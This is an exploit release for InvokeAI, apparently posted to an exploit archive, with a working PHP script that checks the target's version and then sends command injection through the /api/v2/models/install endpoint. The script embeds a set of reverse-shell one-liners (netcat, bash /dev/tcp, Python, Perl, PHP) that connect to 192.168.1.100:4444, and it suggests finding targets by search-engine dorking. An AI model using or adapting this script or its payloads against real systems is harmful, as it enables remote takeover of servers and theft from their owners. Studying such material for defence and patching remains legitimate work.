============================================================================================================================================= | # Title : InvokeAI v5.0 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.invoke.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI, which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity. [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php 127.0.0.1 id [+] SeT target = Line : 99 [+] PayLoad : target = $target; $this->payload = $payload; } private function sendRequest($method, $uri, $headers = [], $data = null) { $url = "http://{$this->target}:{$this->port}/$uri"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_TIMEOUT, 10); // تحديد مهلة الطلب لتجنب الانتظار الطويل if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); } $response = curl_exec($ch); if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch) . "\n"; } curl_close($ch); return $response; } public function checkVulnerability() { echo "[" . date("H:i:s") . "] Checking target...\n"; $response = $this->sendRequest("GET", "api/v1/app/version"); $json = json_decode($response, true); if (!$json || !isset($json['version'])) { return "Unknown version"; } $version = $json['version']; if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) { return "Vulnerable version detected: $version"; } return "Safe version: $version"; } public function sendPayload() { $maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt"; // جميع الحمولات الممكنة للاتصال العكسي $payloads = [ "nc -e /bin/sh 192.168.1.100 4444", // Netcat "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1", // Bash "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3 "perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl "php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell ]; // دمج الحمولات ضمن `source` أو `headers` $payloadCommand = implode(" ; ", $payloads); $headers = [ "Content-Type: application/json", "X-Exploit: {$payloadCommand}" // استغلال إذا كان التطبيق يستخدم الهيدر داخليًا ]; $data = [ "source" => "{$maliciousModel}; {$payloadCommand}", "inplace" => "true" ]; echo "[+] Sending Reverse Shell Payloads...\n"; $response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data); return $response; } public function startExploit() { $check = $this->checkVulnerability(); echo "$check\n"; if (strpos($check, "Vulnerable") === false) { die("[" . date("H:i:s") . "] Target is not vulnerable.\n"); } $result = $this->sendPayload(); echo "[" . date("H:i:s") . "] Response: $result\n"; } } // تنفيذ الاستغلال مع تمرير حمولة "id" لاختبار تنفيذ الأوامر $exploit = new InvokeAIExploit("192.168.1.1", "id"); $exploit->startExploit(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================